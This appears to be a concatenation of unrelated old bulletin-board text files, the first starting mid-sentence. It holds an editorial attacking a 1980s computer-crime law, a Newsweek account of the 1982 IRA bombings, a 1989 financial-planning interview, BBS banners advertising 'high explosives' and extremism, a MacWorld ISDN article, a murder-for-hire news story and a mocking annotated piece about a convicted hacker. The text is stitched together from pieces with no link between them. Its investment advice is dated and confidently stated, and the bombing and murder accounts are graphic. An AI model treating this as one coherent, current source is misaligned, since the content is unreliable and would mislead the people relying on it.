          ABSURD CIRCUMSTANCES THE CONGRESS PASSED AN ABSURD PIECE OF
          COMPUTER LEGISLATION.
             THE NEW CRIMINAL STATUTE EMPOWERS THE TRW, WHICH
          PRESUMABLY HAS NOTHING BETTER TO DO, TO SNOOP AROUND
          THOUSANDS OF COMPUTER "BULLETIN BOARD" SYSTEMS TO PROSECUTE
          COMPUTER "HACKERS" WHO ARE ALLEGEDLY ABUSING CORPORATE AND
          GOVERNMENTAL COMPUTER SYSTEMS FROM COAST TO COAST.
             THE PROBLEM, TO THE EXTENT IT IS A PROBLEM, IS THIS:
          THOUSANDS OF COMPANIES, SCHOOLS, AND GOVERNMENT AGENCIES HAVE
          TELEPHONE HOOKUPS THROUGH WHICH THEIR CUSTOMERS AND EMPLOYES
          CAN CALL A CENTRAL COMPUTER TO GET INFORMATION OR LEAVE
          MESSAGES.
             A COMMON EXAMPLE OF SUCH A SYSTEM WOULD BE A NATIONAL
          RETAIL CHAIN WITH HEADQUARTERS IN NEW YORK CITY. THE CHAIN'S
          DUBUQUE STORE CAN CALL THE COMPUTER IN NEW YORK TO PLACE AN
          ORDER, CHECK ADVERTISING COPY, OR WHAT HAVE YOU.
             EACH SYSTEM HAS SOME SECURITY ARRANGEMENTS TO FEND OFF
          UNWANTED CALLERS. TO GET INTO THE WASHINGTON POST'S NEWSROOM
          COMPUTER, FOR EXAMPLE, YOU NEED TO KNOW THE PHONE NUMBER, AND
          THEN TYPE IN TWO SEPARATE PASSWORDS -- KNOWN ONLY TO THE USER
          -- BEFORE YOU CAN BE CONNECTED.
             THERE HAS BEEN A PROBLEM OF COMPUTER HACKERS AROUND THE
          COUNTRY TRYING TO PENETRATE SOME OF THESE CENTRAL SYSTEMS.
          SOME HACKERS EVIDENTLY DISCOVERED A NUMBER AND A PASSWORD TO
          GET INTO THE TACO BELL COMPUTER, PRESUMABLY ENABLING THE
          INTRUDER TO ORDER 5,000 CASES OF HOT SAUCE OR SOME SUCH.
             THE MOST INFAMOUS INSTANCE TO DATE CAME EARLIER THIS YEAR
          WHEN SOME HACKERS OBTAINED A NUMBER AND PASSWORD ENABLING
          THEM TO RUMMAGE AROUND IN THE ELECTRONIC RECORDS MAINTAINED
          BY TRW INFORMATION SERVICES, A BIG CREDIT AGENCY THAT HAD
          NAMES AND CREDIT NUMBERS OF SOME 90 MILLION PEOPLE.
             ALARMED BY SUCH HAPPENINGS, OUR BENIGHTED CONGRESSPEOPLE
          ROSE FROM THEIR COTS AND PASSED A LAW MAKING IT A FEDERAL
          OFFENSE -- WITH UP TO A YEAR IN JAIL FOR FIRST OFFENDERS --
          TO GAIN "UNAUTHORIZED ACCESS" TO ANY PRIVATE OR GOVERNMENTAL
          DATA BANK CONTAINING PERSONAL OR CORPORATE FINANCIAL RECORDS.
             THIS LAW IS A CLASSIC CASE OF SHOOTING AN ICBM AT A
          MOSQUITO -- AND FIRING WIDE. EVEN IF THE SITUATION WERE
          SERIOUS ENOUGH TO BRING ON THE G-MEN, THE STATUTORY SOLUTION
          CONGRESS HIT ON CANNOT WORK BECAUSE IT IS AIMED AT THE WRONG
          PEOPLE.
             GRANTED THERE ARE SOME BAD APPLES OUT THERE IN HACKERLAND.
          FOR THE MOST PART, THOUGH, THE PEOPLE MAKING THIS
          "UNAUTHORIZED ACCESS" ARE 15-YEAR-OLD COMPUTER "PHREAKS" WHO
          ARE DOING IT SOLELY FOR THE INTELLECTUAL CHALLENGE. IT'S A
          KIDS' GAME. BUT NOW CONGRESS IS DISPATCHING THE FBI TO TRACK
          DOWN THESE EVIL MISCREANTS AND SHIP THEM TO LEAVENWORTH.
             THE REAL PROBLEM WITH "UNAUTHORIZED ACCESS" IS NOT THIS
          CORPS OF PRECOCIOUS KIDS TYPING AWAY AT THEIR COMMODORES BUT
          RATHER THE CORPORATE COMPUTER TYPES WHO DESIGNED THE LEAKY
          CENTRAL SYSTEMS THE HACKERS ARE INVADING.
             IT IS NO GREAT TRICK TO SET UP A COMPUTER SYSTEM THAT
          CAN'T BE PENETRATED. IF YOU CREATE A SERIES OF PASSWORDS,
          PROTECT THEIR SECRECY, AND CHANGE THEM REGULARLY, YOU CAN
          FRUSTRATE JUST ABOUT ANY UNAUTHORIZED INTRUDER.
             MANY OF THE SYSTEMS OPERATING NOW, THOUGH, TREAT SECURITY
          AS A JOKE. TRW, FOR EXAMPLE, SAYS ITS CREDIT RECORDS ARE
          GUARDED AS CAREFULLY AS POSSIBLE. BUT INFOWORLD MAGAZINE
          REPORTED THAT A "SECRET" TRW PASSWORD MAY HAVE BEEN PRINTED
          ON CREDIT REPORTS ROUTINELY GIVEN TO PEOPLE APPLYING FOR A
          CREDIT CARD AT SEARS, AMONG OTHER PLACES. IT SAID THE SAME
          PASSWORD WAS PASSED AROUND FOR MONTHS, BUT THAT TRW DID NOT
          BOTHER TO ISSUE A NEW ONE.
             A GARDEN GROVE, CALIF., CONSUMER NAMED BURT MAZELOW HAS
          SUED TRW FOR FAILING TO PROTECT HIS CREDIT RECORDS FROM
          SNOOPERS. WITHOUT PREJUDGING THIS PARTICULAR CASE, ONE CAN
          SAY THAT MAZELOW HAS FOUND A MUCH MORE INTELLIGENT APPROACH
          TO THE PROBLEM THAN OUR SLEEPY SENATORS CAME UP WITH.
             IF THE PROBLEM OF "UNAUTHORIZED ACCESS" IS TO BE STOPPED,
          IT'S PATENTLY OBVIOUS THAT CHANGES WILL HAVE TO COME AT THE
          CENTRAL-COMPUTER LEVEL. INSTEAD OF HOUNDING RAMBUNCTIOUS KIDS
          GIVING THEIR COMPUTERS A WORKOUT, THE GOVERNMENT SHOULD
          ATTACK THIS PROBLEM AT THE SOURCE: THE CORPORATE AND
          GOVERNMENTAL BUREAUCRACIES THAT HAVE BEEN TOO DUMB OR TOO
          CHEAP TO MAKE SURE THAT PRIVATE INFORMATION IS REALLY
          PRIVATE.
2 August 1982, Newsweek Magazine, pp. 31-32:

"The plumed Blues and Royals were a noble spectacle as they rode their
black mounts at a walk through London's Hyde Park.  But as the
cavalrymen marched past a parked sedan, a bomb hidden inside exploded.
Windows shattered for blocks, flames burst high into the air and nails
wrapped around the explosive shot out like bullets.  Horses fell in a
writhing mass, dying soldiers bled into the tatters of their ornate
uniforms and a woman passer-by, her face shredded, screamed, 'Help me!
Help me!'
"Less than two hours later, on a bandstand in Regent's Park, the band
of the Royal Green Jackets was giving a concert.  As it played a
medley from the musical 'Oliver!' a bomb hidden beneath the stage
exploded --  and the entire bandstand erupted.  'Everything seemed to
come up from the bottom of the bandstand and flew right into the air
- --  the bodies, the instruments, everything,' said Ronald Benjamin, a
member of the audience.  'A leg came within 5 feet of me.'
"In one bloody day, the Irish Republican Army once again brought its
war against the English to England.  Even by IRA standards, last
week's carnage was extraordinary: the blast at Hyde Park killed 4
cavalrymen and injured 22 guards and civilians; in Regent's Park, 6
bandsmen died and 24 musicians and 4 civilians were injured...
"The terrorists planned their attack carefully.  They parked a blue
Morris sedan on Carriage Road, about 600 yards along the cavalry's
daily route.  Hidden inside was up to 10 pounds of gelignite explosive
wrapped with hundreds of 4- and 6-inch nails.  As the Blues and Royals
passed, an IRA member, probably hidden in the trees of Hyde Park,
punched a remote-controlled detonator...
"The bomb [in Regent's Park] was planted under the floorboards on the
stage.  It was similar to the earlier bomb, but apparently worked on a
timing device instead of remote control..."
     Philadelphia financial planner Christine C.  Dattilo is interviewed by
Investor's Forum comanager and OnLine Today financial writer Mike Pietruk.

June 14,1989:

How much cash reserve should an individual have in savings prior to
considering investing?

A rule-of-thumb for liquid cash reserves is savings of 3 months salary.
But I believe two factors in today's economy call for an increase in
savings equal to 6 months salary.  The first is a likely economic downturn
- a recession.  During recession periods layoffs will increase and the time
to acquire a new job with a similar salary will also lengthen.  (Tip:
Monitor the frequently watched statistic of # of help wanted ads, and
length of time it takes for a job to be filled satisfactorily, increase
your savings as these numbers decrease).  The second factor impacting
liquid savings is the amount of personal credit we carry.  This number is
at historical highs.  Many families have little reserve credit to rely on,
and also are beginning to find even minimum payments burdensome.  Remember
that even though 6 months of salary may seem like a lot of money you don't
want to damage your credit rating by becoming a "slow pay" or defaulting.
In case of extreme emergencies you may need to draw on whatever credit you
have.


Should one keep their savings in checking, passbook savings, CD's, Money
Market funds or what?

Liquid cash reserves, should be exactly what they imply, Liquid.  That
would mean CD's with withdrawal penalties aren't probably a good idea.
Passbook savings pay inexcusably low rates on your money.  Checking
accounts, even the interest bearing variety don't adequately reflect your
reserves - they're too easily susceptible to spending temptations.
Therefore I would recommend a type of Money Market.  Shop around for a
money market fund or account with low management fees a history of paying
some of the highest rates available.  (Hint:  Check Donaghue's).  Try to
find a Money Market that allows you to wire money to your bank account in
case of emergencies, and also has checkwriting privileges.


Do you have any interesting ideas for people to save or interesting
products that folks typically overlook?

I think many people have some of the best savings opportunities right in
front of their nose.  These would be employer sponsored plans.  Many
companies offer thrift-savings plans, credit union accounts with payroll
deduction, low-interest rate credit cards and loans.  Check these areas out
first.  As far as interesting products, one of the most exciting is the
Pilgrim Prime Rate Trust.  This product pools your money with other
investors to buy Senior Collateralized Notes (a product that's only been
available to investors of $5 million or more).  The result is that your
account is credited with prime rate interest.  Your rate fluctuates with
the Prime Rate.  Currently Pilgrim Prime Rate Trust is paying 11%, and the
Net Asset Value of the shares have never fluctuated from the original price
of $10.00.  I believe this and other innovative products are worth serious
consideration for a family's liquid cash reserves.


When one has enough cash to begin investing, where should they put these
funds?

As soon as one has a good cash reserve built-up they should set up an
investment program immediately.  A good place to start is an equity mutual
fund.  With a decent cash reserve an investor should be able to withstand
the ups and downs of the stock market.  Many funds have systematic dollar
cost averaging programs (the best way to invest, no matter how much or how
little money you have).  The Franklin Group allows deposits as little as
$25.00 a month.  And Colonial Investors will automatically dollar cost
average your investment out of their money market fund into one of their
mutual, assuring you that your money never sits idle.  For the beginning
investor I wouldn't look much further than mutual funds.  There are mutual
funds that invest in Real Estate, Strategic Metals, OTC Stock and Energy
providing much in the way of diversification.


Should one diversify, and what is your feeling about speculation?

Diversification is always prudent.  With diversification you are buying
increased safety.  As soon as one can carry a good balance in a solid
equity mutual fund, (a good guideline is 4-6 months salary, with a minimum
of $5000) its time to diversify.  Being a firm believer in the "buy and
hold" strategy, I'd recommend a diversification of 60% stocks, 30% bonds,
and 10% in real estate, precious metals, or maybe even a good energy fund.
     You asked about speculation.  Being a financial advisor I have a
difficult time recommending speculation in any field that your not employed
in full-time (i.e.  a commodity trader on the side).  But I also understand
that to some, money would be no fun unless they could speculate.  So go
ahead, speculate!  But with only 10% of your invested monies - and don't
leverage that 10% beyond 1/10th of your net worth.


How much should one put down towards a home--the minimum the bank requires
or should a person strive for the maximum down payment they can afford or
put together?

The home mortgage deduction is about the only deduction left.  So my advice
is put down the minimum down payment required and take the full advantage
of the deduction.  Put any extra savings into your investment program.


How important is insurance planning, and does this change as one grows
older and one's income and family needs change.

Adequate life insurance is critical.  But life insurance should be bought
to be life insurance, not an investment (although if it provides investment
benefits, fine).  Don't overbuy insurance.  You'll find it to be an
expensive investment.  Disability insurance is also important and often
overlooked.  Don't ignore your needs in case of disability.  Insurance
needs do change as you grow older, richer, poorer, and bigger(family-wise).
Have your insurance reviewed every 5-7 years.  But don't change policies
easily until you've looked at ALL the ramifications to your taxes, cash
values, surrender values, and current cost of insurance.


When should one begin planning for retirement, and which vehicles should
one use in this planning?

Begin planning for your retirement in your early 20's.  Look to your
company for the best planning vehicles.  Make sure to maximize 401K payroll
deductions before considering other vehicles such as tax-deferred annuities
or life insurance savings plans.  If you are self-employed start a SEP
(Simplified Employee Pension), its better than an IRA and often called a
Super-IRA.  Lastly, contribute to an IRA.  IRA's are not dead, and still
make excellent savings vehicles even if not fully deductible.


How do we change both our general investment planning and our retirement
planning as we grow older?

As you grow older its important to diversify away from long term
investments such as real estate.  Your concentration should focus towards
bonds and away from equities.  At 60 years and older I'd keep a minimum of
60% of investments in bond funds.  At 65 make sure those bond funds are
tax-free - because of the new Medicare surcharge tax.  Annuities are worth
serious consideration when you near retirement.  The guaranteed monthly
payment of an annuity can help you plan retirement without worry about
market conditions or interest rate fluctuations.


Is it a mistake to separate general wealth building from retirement
planning?

The answer to that question is Yes and No.  When you are young (45 and
younger) I feel you should ALWAYS be extremely conservative with your
retirement money.  Set aside every dollar you can in company sponsored
plans for retirement.  If you have no company plans, set up your own
retirement plan with an annuity.  With a variable annuity you can even
design your own conservative investment plan, diversifying among fixed
accounts, bond funds, and stock funds.  Contribute to that annuity
annually.  Also make sure you are contributing to an IRA.  With your
investment dollars you can be more aggressive.  You can choose from a
variety of aggressive growth mutual funds, growth - income funds, blue-chip
funds, small cap funds etc.  Tax-deferral should take a backseat to the
quality of the investment.  Certainly real estate, and carefully chosen
individual stocks are appropriate for the young investor.
     For the middle-age to older investor (45 and older) you should also be
extremely conservative with your retirement money.  But you also should be
more conservative with your "wealth building" dollars.  An investment in
real estate or other long term (10 years or longer) investments become less
desirable.  An investor should look to move all their money more towards
bonds and other semi-liquid investments.  Tax-deferral is worth serious
consideration, as the chances for early withdrawal penalties become less.
     I think in one's later years the focus should be on a well-provided
plan for retirement.  Your investment policy should be evaluated in this
light.


Finally, as that day of "no work" and retirement arrives, what should we do
with our money?

Enjoy it!  Stop worrying about making "the big score".  If you've planned
carefully you'll have adequate health insurance, a cash reserve invested in
high interest paying accounts, and taxes won't be a major concern (use
tax-free's to help avoid the bite of the Medicare surcharge).  If you have
a large estate you should be sitting down with a good estate planner.
Hopefully your life insurance is up-to-date.  Latest statistics show that
only 6% of the population 65 and over are financially independent without
working.  Its a sobering thought.  So start early, plan carefully, and
enjoy.



X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

 Another file downloaded from:                               NIRVANAnet(tm)

 & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
 Rat Head                                 Ratsnatcher          510-524-3649
 Burn This Flag                           Zardoz               408-363-9766
 realitycheck                             Poindexter Fortran   415-567-7043
 Lies Unlimited                           Mick Freen           415-583-4102

   Specializing in conversations, obscure information, high explosives,
       arcane knowledge, political extremism, diversive sexuality,
       insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.

  Full access for first-time callers.  We don't want to know who you are,
   where you live, or what your phone number is. We are not Big Brother.

                          "Raw Data for Raw Nerves"

X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
ANOTHER PART OF YOUR LIFE IS ABOUT TO
go digital. This time it's data communica-
tiontransferring files, connecting to re-
mote networks, and other "talking" a
computer does on the phone with fellow
computers. By going digital, you don't
need to use error-prone analog modems;
instead you get nearly error-free data
communication at speeds modems can
only dream of. Telephone companies in
the United States, Canada, Japan, and
Western Europe offer digital services that
cost about the same to use per call as high-
speed modems. These services are called
switched digital services because they take
advantage of switched phone lines to keep
costs down. Placing a call switches on a
connection to a phone line, and ending a
call switches off the connection, freeing the
line for another call. You pay only for calls
you make, not for full-time use of a dedi-
cated phone line.
MacWorld started using switched digi-
tal services last summer to transmit
scanned-image files and Aldus PageMaker
files of magazine pages to and from Digi-
tal Pre-Press International (DPI), a San
Francisco prepress service bureau. The
files, which range in size from several
hundred kilobytes to over 100 megabytes,
used to be copied onto disk cartridges and
carried to DPI by bike messenger. In ad-
dition, MacWorld's San Francisco office
keeps stories and artwork on a file server
that sister magazines in other countries can
quickly access using switched digital ser-
vices. Previewing and copying those files
by modem takes forever, and transfers
too often fail due to noisy phone lines.

What You Get

U.S. TELEPHONE COMPANIES OFFER
two types of switched digital services,
switched 56-kbps service and ISDN (In-
tegrated Services Digital Network). With
switched 56 service you get a single
phone line that can transfer digital data
at speeds up to 56,000 bits per second.
You can't use the line to make voice calls
or send Group 3 faxes.

ISDN service gives you more than
one communication channel on a single
line. You get two or more 64,000-bps
channels for digitized voice, digital data,
or Group 4 (high-speed digital) fax calls.
These are called B (Bearer) channels.
You can use B channels independently or
combine the channels for higher data-
transmission rates. For example, you
might talk on one B channel while your
computer communicates on another, or
you might combine two B channels for
video teleconferencing.

The B channels only carry content.
Another channel, called the D (Delta)
channel, carries signaling information
that makes and controls B-channel con-
nections. The D channel operates at
16,000 bps or 64,000 bps depending on
the type of ISDN service. Signaling
doesn't keep the D channel busy, so it can
also be used for data transfer at rates
equivalent to those of a 9600-bps modem
or for X.2 5 packet switching.

In addition to data-transfer capabili-
ties, ISDN can improve the sound qual-
ity of voice calls. ISDN also offers fea-
tures such as the ability to display a
caller's phone number before you answer
a call, add that number to a list of unan-
swered calls, or use it to look up infor-
mation about the caller in your database.
(Access to the caller's number may be re-
stricted or blocked in some states.) Several
newly announced applications can use
ISDN voice features, including Northern
Telecom's Meridien TeleCenter, and
Cvpress Research's PhonePro.

Where It Goes

ALTHROGH SWITCHED 56 AND ISDN
are switched services, you can't use them
to call just anywhere. You can call other
switched digital lines served by the same
central office. Calling beyond your local
telephone company's central office be-
comes more complicated, especially for
ISDN. The transmission rate drops to
56,000 bps because that's the maximum
for the trunk lines that carry calls outside
a central office. Likewise, calls outside
your service area (as depicted in your
telephone book), state, or country run at
56,000 bps.

For example, MacWorld and DPI are
served by the same central office in San
Francisco and can transfer files at 64,000
bps over an ISDN line. But when Mac-
World Japan places an ISDN call to Mac-
World in San Francisco, the two commu-
nicate at 56,000 bps. Still, that transfer
speed is many times faster than a high-
speed modem.

Where It Is

YOU MAY HAVE TROUBLE OBTAINING
ISDN or switched 56 service from your
local phone company. Neither service is
available everywhere. Right now ISDN
service is concentrated in the business
districts of major metropolitan areas (see
"ISDN Lines in the U.S."). Switched 56
service is more widely available but is not
universal. Even in areas where switched
digital services are available, phone com-
pany representatives may not know
ISDN and switched 56 exist, or they may
not know them by those generic names.
Each phone company has its own names
for these services. Pacific Bell, for ex-
ample, has an ISDN service named
Centrex IS and a switched 56 service
named CenPath. Fortunately this picture
should improve during the next year as
telephone companies install more ISDN
and switched 56 services and promote
them more aggressively.

Like names, charges for switched
digital services vary among phone com-
panies. Your local phone company may
compound the cost of getting ISDN or
switched 56 by requiring that you also
have an unrelated service such as
Centrex, which gives business customers
PBX capabilities from the phone-com-
pany central office. Pacific Bell charges
$540 to $650 to establish Centrex service
and install two Centrex lines (its mini-
mum) with a switched digital service on
one of them. In addition to paying the
phone company's installation costs, you
must buy special equipment to attach to
the phone lines (the type of equipment
varies depending on the type of service
the phone company offers). Pacific Bell
charges $30 to $40 monthly per switched
digital line and $15 per conventional
voice Centrex line. You also pay connect
charges at standard voice-call rates.
Lower-cost switched digital services are
available in some parts of the United
States and should become more wide-
spread this year.

If vou plan to make ISDN or switched
56 calls outside your state or service area,
vou must choose a long-distance company
and pay it for those calls. Switched digi-
tal calls cost the same as ordinary voice
calls on AT&T, MCI, and Sprint.

To get ISDN at your building, you
must be located within about 2 miles of
a phone company central office that has
switching equipment for routing ISDN
calls. This distance will in-
crease to about 3.5 miles as
telephone companies install
new switching equipment
over the next few years. For
switched 56 service vou must
be within about 3.5 miles of a
central office with switched
56 switching equipment. The
geographical areas served by
central offices vary widely;
they are roughly the size of
but by no means coincide
with  zip code areas. If you
are farther away than the
maximum distance, the phone
company must run a high-
speed dedicated line from a
switched digital central office
to your phone company cen-
tral office or directly to your
building. You pay a monthly
fee for full-time use of that
line and also pay by the call
for calls that must be routed
beyond the central office. A
dedicated line is generally not
economical unless you install at least six
ISDN or switched 56 lines on it.

Inside Your Building

NEITHER BASIC-RATE ISDN (TWO B
channels and one D channel) nor switched
56 service requires special wiring inside
your building. Basic-rate ISDN service,
like ordinary voice service, uses two of the
four wires routed to common RJ- 11
modular jacks. Switched 56 service re-
quires either two wires or four, depending
on the specific type of service your phone
company offers. You can usually replace
an existing voice line with basic-rate
ISDN or switched 56 service without any
wiring change inside the building.

To use an ISDN line, you must install
a terminator, called an NTl, to maintain
signal quality on the phone-company
lines. The NTl terminator usually con-
nects to your RJ-l 1 wall jack. It costs $100
to $300, and you must buy one that has
been made for the switching equipment
installed in your phone company's central
office. As the switching equipment mi-
grates to new standards over the next few
years, you should have a wider choice of
vendors. Switched 56 service does not
need a terminator.

Connecting to a Mac

ALTHOUGH ISDN AND SWITCHED
56 services transfer data digitally, you
can't connect them directly to a com-
puter. You don't need an ordinary mo-
dem to convert digital data from the
computer to analog data (sounds) or the
reverse. Instead you need a device that
prepares the digital data from a com-
puter for transmission on digital phone
lines. Think of it as a digital modem.

The ISDN digital modem is called a
terminal adapter (TA). You can buy a
freestanding TA from Northern Tele-
com, Fujitsu, Hayes, UDS/Motorola,
and other companies for $750 to $2000.
You can also install a TA inside any
Macintosh with a spare NuBus slot.
Apple should already be shipping its
$1099 ISDN NB Card. Apple's NuBus
board and some of the freestanding TAs
convert a second B channel to let you
plug in a standard telephone, answering
machine, or Group 3 fax machine. Alter-
natively, you can buy an ISDN telephone
with an integral TA and data port for
$500 to $1000 from AT&T or Fujitsu,
or for $700 to $1100 from Telrad.

Digital modems for switched 56 go
under two names, depending on the type
of switched 56 service your phone com-
pany offers. One is called a DSU/CSU
(Digital Service Unit/Channel Service
Unit) and the other is called a Data Unit.
AT&T, Northern Telecom, UDS/
Motorola, and others sell them. Some
ISDN terminal adapters can also be used
as switched 56 digital modems.

To further complicate the situation,
digital modems are not all compatible
with each other, nor is every digital mo-
dem compatible with all types of switch-
ing equipment used in phone-company
central offices. You may be unable to call
someone else who has switched digital
service because your digital modems are
incompatible. And if you're not careful,
you could buy a digital modem that
won't work with the switching equip-
ment at your phone-company central of-
fice or with the switching equipment at
your new central office after you move
across town.

Using a Digital Modem

DIGITAL MODELS WITH SWITCHED
digital services can speed up file transfer,
screen sharing, and remote network ac-
cess. For simple file transfer between two
Macs, you can use Microphone II,
WhiteKnight, VersaTerm Pro, or an-
other terminal program. To remotely
operate (and exchange files with) another
Macintosh, you can use screen-sharing
software like Timbuktu/Remote. Prod-
ucts like Farallon's PhoneNet Liaison
and Shiva's TeleBridge let you access
E-mail, file servers, and other network
services from a remote Mac.

When used with a freestanding digi-
tal modem connected to the Mac's mo-
dem or printer port, none of these appli-
cations can take full advantage of
switched digital speed. The Mac serial
ports can run at 57,600 bps asynchro-
nously, but today's system software, which
handles serial communications for appli-
cation programs, can't sustain that rate.
The serial port can usually sustain a
throughput rate of 19,200 bpsthe exact
speed depends on factors such as the speed
of your Mac, the communications proto-
col, and the design of the application
program.

Some programs can achieve full
switched digital speed if they are used
with an ISDN NuBus board. These pro-
grams use the Communications Toolbox
part of system software to transfer data
synchronously at 56,000 bps or 64,000 bps
through the ISDN board. At this writing,
VersaTerm Pro and Timbuktu/Remote
are compatible with the Communications
Toolbox, and compatible versions of the
other products mentioned above are in
progress. (The Communications Toolbox
is built into System 7 and can be added as
an INIT to Systems 6.0.4 through 6.0.8.)

On Your Network

WITH SWITCHED DIGITAL SER-
vices you can go beyond connecting 
Mac to a distant network. You can
interconnect multiple AppleTalk
networks and share network ser-
vices. For instance, MacWorld af-
filiates in different countries can
link networks to access each
other's file servers and exchange
E-mail by placing ISDN phone
calls. After linking networks, a
MacWorld editor uses Timbuktu (Remote Acess Software)to
preview large illustrations (by
opening them on the distant
network's file server) and to trans-
fer files. Timbuktu or a new prod-
uct, Aspects, let several users work
on the same document simulta-
neously from separate Macs.

You can also access a distant
network with the Chooser and
connect to file servers, items
shared with System 7's file shar-
ing, and printers. If you use the
Chooser to mount a distant file
server or shared item on your
desktop, you can copy files to or
from the server with the Finder.
With applications that take advan-
tage of System 7's publish and
subscribe technology, you can in-
clude live copies of material from
a distant file server or shared disk.
If someone changes the original
material, your documents are au-
tomaticaliy updated across the
switched digital network link. Ap-
plications that use System 7's pro-
gram-linking capability to share
services, such as MacProject II 2.5
and Claris Resolve, could be lo-
cated on remote networks.

To set up a switched digital
link between AppleTalk networks,
you connect each network to a
router, each router to a modem,
and each digital modem to a
switched digital phone line. The
router examines packets of data traveling
on the local network and routes packets
headed for the distant network across the
phone line.

Some routers, such as Farallon's

- $395 PhoneNet Liaison, are software
that run on any Macintosh connected to
the network. Hardware routers connect
independently to the LocalTalk cabling.
They include Engage Communication's
$1895 SyncRouter, Shiva's $599 Tele-
Bridge, Solana Electronics' $2195
H-Server, and International Transware's
$899 TransTalk. Although the Phone-
Net Liaison and the TeleBridge routers
cost less, they communicate asynchro-
nously at only 19,200 bps to 38,400 bps.
The other routers communicate syn-
chronouslv at the switched digital
service's full 64,000 bps or 56,000 bps.

Routers made by different companies
are incompatible, and more compatibil-
ity problems exist between routers, digi-
tal modems, and phone-company central-
office switching equipment. In setting
up its international file server, for ex-
ample, MacWorld first tried H-Servers,
found them to be incompatible with
something in Tokyo, switched to Synch-
Routers, and is currently evaluating
TransTalk routers for its enhanced net-
work-security options. Other people in
Tokyo, New York, and Paris, however,
have used H-Servers without any trou-
ble whatsoever.

To make your network more secure,
some routers let vou restrict access bv
users on linked networks to specific zones
in your network. Without this zone-
blocking control someone at MacWorld
could accidentally print a docu-
ment on DPI's imagesettera
costly mistake. Some routers offer
other security provisions that help
keep hackers out of your network.

Experienced users say network
performance across a switched
digital link rivals that of a direct
connection to a LocalTalk net-
work with five to ten active users.
Apparently a private 56,000-bps or
64,000-bps connection using a
hardware router approximately
matches an individual's share of a
232,000-bps LocalTalk or Phone-
Net-type connection. Of course
performance declines when several
people actively use an ISDN or
switched 56 network connection
simultaneously. Your choice of
digital modem and router may also
give you lower performance.

Not only are switched digital
services fast, they are also ex-
tremely reliable. You can't transfer
multimegabyte files frequently us-
ing ordinary modems and voice
phone lines without failures due to
line noise. But MacWorld editors
routinely use ISDN to transfer
tens of megabytes across town and
across the Pacific without any fail-
ure. Other ISDN and switched 56
users report the same reliability
no errors, period.

ISDN Today

SWITCHED 56 AND ISDN PROMISE
a lot and deliver it to some Macin-
tosh users, but don't hang up your
modem just yet. You'll still need it
to connect to commercial informa-
tion services, national E-mail ser-
vices, and electronic bulletin
boards. And if vou sometimes ac-
cess files and E-mail on your office
network or your office Macintosh from
home or a hotel room, you'll want a mo-
dem for that too. Switched digital ser-
vices can't help you with those connec-
tions today.

Right now those most able to take
advantage of ISDN or switched 56 ser-
vices are businesses needing to link loca-
tions and transfer lots of data regularly but
not constantly. The rest of us must anx-
iously wait while switched digital services
come to our telephone prefixes. 
  Jilted businessman accused in botched murder plot

   DOYLESTOWN, Pa. (UPI) _ They tried to kill him with a crossbow.
And a gun. And a bomb, a truck and a Molotov cocktail.

   Police say all five attempts by hitmen to kill Edward Coulter
failed, but the botched attempts led them to their prime suspect,
Philadelphia businessman Alfons Kessler, 47.

   Kessler was charged Friday with conspiracy, attempted murder and
related charges for allegedly trying to arrange the death of
Coulter _ who is married to Catherine Coulter, Kessler's former
lover of 10 years.

   Police unraveled the case when one of the accused hitmen was
badly hurt last week by a pipe bomb he was trying to plant at
Coulter's home.

   ``I'm not so sure they failed so miserably,'' Assistant Bucks
County District Attorney Dale Reichley said Friday. ``I wouldn't
call them a bunch of misfits ... this was a powerful bomb.''

   Kessler was Catherine Coulter's boss as general manager of C.A.
Spaulding Co., a tool company. Mrs. Coulter was the firm's
controller.

   Prosecutors said Kessler allegedly hatched the murder plot after
Catherine Coulter last year broke off a 10-year affair with him.
Reichley said Catherine Coulter has not been charged in the case,
and the investigation is continuing.

   Between September and February, Coulter was shot at with a
crossbow and a gun, was nearly run off the road by a truck and
someone tossed a Molotov cocktail into his dining room.

   Coulter was unaware why he was being targeted, and police had
been providing him with escorts to and from work.

   One of the accused hit men, Wesley Rankin, 44, was arrested Feb.
27 after the pipe bomb he was trying to plant in the garage of
Coulter's Bensalem home went off prematurely, blowing off his right
hand and forearm.

   Police said Kessler paid Rankin $2,500 for the bombing, and an
undisclosed sum of money for the other attempts.

   Authorities are still looking for the second accused hit man,
Dwyaine Farley, 23, of Philadelphia.


X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
 Another file downloaded from:                     The NIRVANAnet(tm) Seven

 & the Temple of the Screaming Electron   Taipan Enigma        510/935-5845
 Burn This Flag                           Zardoz               408/363-9766
 realitycheck                             Poindexter Fortran   510/527-1662
 Lies Unlimited                           Mick Freen           801/278-2699
 The New Dork Sublime                     Biffnix              415/864-DORK
 The Shrine                               Rif Raf              206/794-6674
 Planet Mirth                             Simon Jester         510/786-6560

                          "Raw Data for Raw Nerves"
X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

                "HACKER'S STORY: Two days on long distance"


SOURCE: Toronto Computes! June '91
ENTERED BY: Anarchy Tech

[ This is a typical example of someone that "became" (Hahahahaha) a "hacker"
 (as he calls himself) for all the wrong reasons, and turned into an even lower
 life-form when he was caught. It is this kind of moron that gives the REAL
 hackers a bad name in society. ] -AT

**NOTE** entries surrounded by square brackets "[]" are injection by me (AT).

  John Medica has been cured [Hahahaha] of his addiction to hacking. He was
cured by a police bust and a theft conviction that landed him two years'
probation and 100 hours of community service.
  Now the 22 year old Toronto man [mouse] wants to warn companies  that
 hackers are out to get them. [ What a CROCK this is! Since when was HACKING
(in it's most purest form) truely destructive!? ] And he wants to warn hackers
that they can't always evade detection. [No shit, sherlock.]

  "If you get into it you're taking a risk. I thought I might get away with
murder. If they don't listen then it's not my fault. Down the road they'll
be in the same situation as me."
  He says many companies are very vulnerable to hacking.
  "There's a problem out there. I know a lot of people hacking on UNIX."
[whistle, whistle] UNIX is a high-end operating system used by many government
departments.
  "Down the road you could see federal systems going down," Medica warns.
   Medica says he became a hacker for fun and for braggin rights on computer
bulletin boards.
